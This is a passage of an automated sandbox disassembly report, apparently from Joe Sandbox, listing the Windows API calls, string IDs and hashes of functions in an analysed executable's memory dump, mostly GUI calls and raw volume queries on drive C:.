                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 00454A46
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000), ref: 00454ABC
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090064,00000000,00000000,00000340,00000060,00000003,00000000), ref: 00454AE8
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454AFA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandleInformationVolume
                                                                                                                                                                                                                                                                                                • String ID: C:\$NTFS$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1233574911-974996950
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a7ffa21548745985fbbbea45252e330d1802da0f0ea7318edadfa9cc625902c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE311D71608300AFE320CF64D885B6BB7F8AF88714F400A2DF549D7291E7B5E584CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: Selected$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3404155819
                                                                                                                                                                                                                                                                                                • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
APIs
• SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 00420AB8
• SendMessageW.USER32(?,0000101D,00000005,00000000), ref: 00420ACA
• SendMessageW.USER32(?,00001207,00000006,?), ref: 00420AE9
• GetClientRect.USER32(?,?), ref: 00420AFB
• SendMessageW.USER32(?,0000101E,00000005), ref: 00420B28
• SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00420B37
Strings
Memory Dump Source
• Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_111392827.jbxd
Similarity
• API ID: MessageSend$ClientRect
• String ID: Button_Check
• API String ID: 1925248871-1860365581
APIs
• SysFreeString.OLEAUT32(00000000), ref: 00453297
• SysAllocString.OLEAUT32(?), ref: 00453332
• VariantInit.OLEAUT32(?), ref: 004533BF
• VariantInit.OLEAUT32(?), ref: 004533E6
• SysFreeString.OLEAUT32(?), ref: 004534A6
• VariantClear.OLEAUT32(?), ref: 004534B7
• VariantClear.OLEAUT32(?), ref: 004534BE
• VariantClear.OLEAUT32(?), ref: 004534C5
Memory Dump Source
• Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_111392827.jbxd
Similarity
• API ID: Variant$ClearString$FreeInit$Alloc
• String ID:
• API String ID: 1906771560-0
APIs
• IsWindow.USER32(?), ref: 004181B6
• GetWindowRect.USER32(?,00000006), ref: 00418204
• GetWindowRect.USER32(?,000003FD), ref: 0041827F
• GetWindowRect.USER32(?,000003FD), ref: 004182FA
• GetClientRect.USER32(?,?), ref: 0041833E
• GetWindowRect.USER32(?,?), ref: 00418350
• SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
Memory Dump Source
• Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1071774122-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042EF55
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF6C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF88
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 0042EFF2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,?,00000000), ref: 0042F0A9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                                • Instruction ID: 4a8da6b0a3b4820785d32a6e99519bf5ba1baf34d33d3eec9a517c422a0835b5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C51E2716083109BD720DF25E981B5BB7F4FB88710F800A7EF94997392D775E8058B9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32 ref: 0042EDC0
                                                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0042EDEF
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE38
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE65
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042EEC4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$LongName$BrowseFolderFromListMessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402075
                                                                                                                                                                                                                                                                                                • API String ID: 3410855119-2194680865
                                                                                                                                                                                                                                                                                                • Opcode ID: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                                • Instruction ID: 60252550f2a576e17c879c635a3a802f8da064449550e8d1e332f21db53478d5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F416471508301AFD310DF65DDC8EABBBE8FB58351F40092EF55A921E0D7749849CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00503601
                                                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00503609
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00503692
                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 005036BD
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00503712
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                • Opcode ID: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 821d69273ac79cc1eb4721babc24db78b3a3adc9ff51cf5d9205813b4df27ecf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2418234A00209AFCF10DF69C885A9EBFA9FF85314F148166E8195B3D2D732DB15CB91
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                                • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(1088D068), ref: 00423545
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401016
                                                                                                                                                                                                                                                                                                • API String ID: 390680170-1597404659
                                                                                                                                                                                                                                                                                                • Opcode ID: d70c479b33c264398e28cb7ff03fea03c89dfeb31a69bd09b7f4b8d505c0b054
                                                                                                                                                                                                                                                                                                • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d70c479b33c264398e28cb7ff03fea03c89dfeb31a69bd09b7f4b8d505c0b054
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000,?,?,004543B4,?,00000000,00000000), ref: 004541C4
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00454215
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045421F
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045422C
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,1088D068,?,00000000,?,?,004543B4,?,00000000,00000000,?,?,?,?,?), ref: 00454273
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                                                                • String ID: \\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1177325624-259948872
                                                                                                                                                                                                                                                                                                • Opcode ID: 97f6d277518962508a84672de340e9009c68024a49f3c9384519941a69a054d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 8413255d3e20ee0171831c1fd4e9de5db1cf6cd8e0bd52f5cbead1f2af0ef7cc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f6d277518962508a84672de340e9009c68024a49f3c9384519941a69a054d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 943169B1A08310AFD310DF55D884A5BBBE8EBC9758F00492EF948D7351D6749884CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                                • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,1088D068,75A85540,?,?,00421AA0,1088D068), ref: 004242B3
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                                • String ID: %s: %I64u $3401050$3401080
                                                                                                                                                                                                                                                                                                • API String ID: 730354411-73662114
                                                                                                                                                                                                                                                                                                • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadMenuW.USER32(00000000), ref: 00421C48
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000001), ref: 00421C73
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$Load
                                                                                                                                                                                                                                                                                                • String ID: 3401014$3401015$3401098$3401131
                                                                                                                                                                                                                                                                                                • API String ID: 1099491344-459607355
                                                                                                                                                                                                                                                                                                • Opcode ID: 3daee7f433f137dee35f0ab3b345e87951239ebd58aaa073a69fa44f9e9ad44f
                                                                                                                                                                                                                                                                                                • Instruction ID: 65f7511ee5ed7a7f8c5efca7cfc7679ab30607739772d43bc8df1ff197a1c7fd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3daee7f433f137dee35f0ab3b345e87951239ebd58aaa073a69fa44f9e9ad44f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2174F1B9431076D364ABA19C03FAF72A8AF84B04F10C91FB64E725C1CEAC640157AD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                                • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                                • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                                • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                                • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432EB2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432EF5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,-00000002,00000000), ref: 00432F33
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402077$3402078$3402079
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-670106401
                                                                                                                                                                                                                                                                                                • Opcode ID: 1e581721c84f0c249b880909b493c1dbc8988a95a366e13f64cc3adfbf7eb187
                                                                                                                                                                                                                                                                                                • Instruction ID: c04858277577f06559cf2ee2803e4bbf63125390443237cb6e41332b9df5dc51
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e581721c84f0c249b880909b493c1dbc8988a95a366e13f64cc3adfbf7eb187
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A2183B56947406BD321DF50CD86FAB73A8EB88B11F10491FF31EA25C0CAA8A804976D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00431D46
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00431D78
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431D9E
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00431DBC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00431DCA
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00431E69
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapClientMessageObjectRectSelectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2414545248-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                                • Instruction ID: 8bb2e0385ae3c531c2e170360c03eff7dceb5b5f9b27b4236f5b68df8b256744
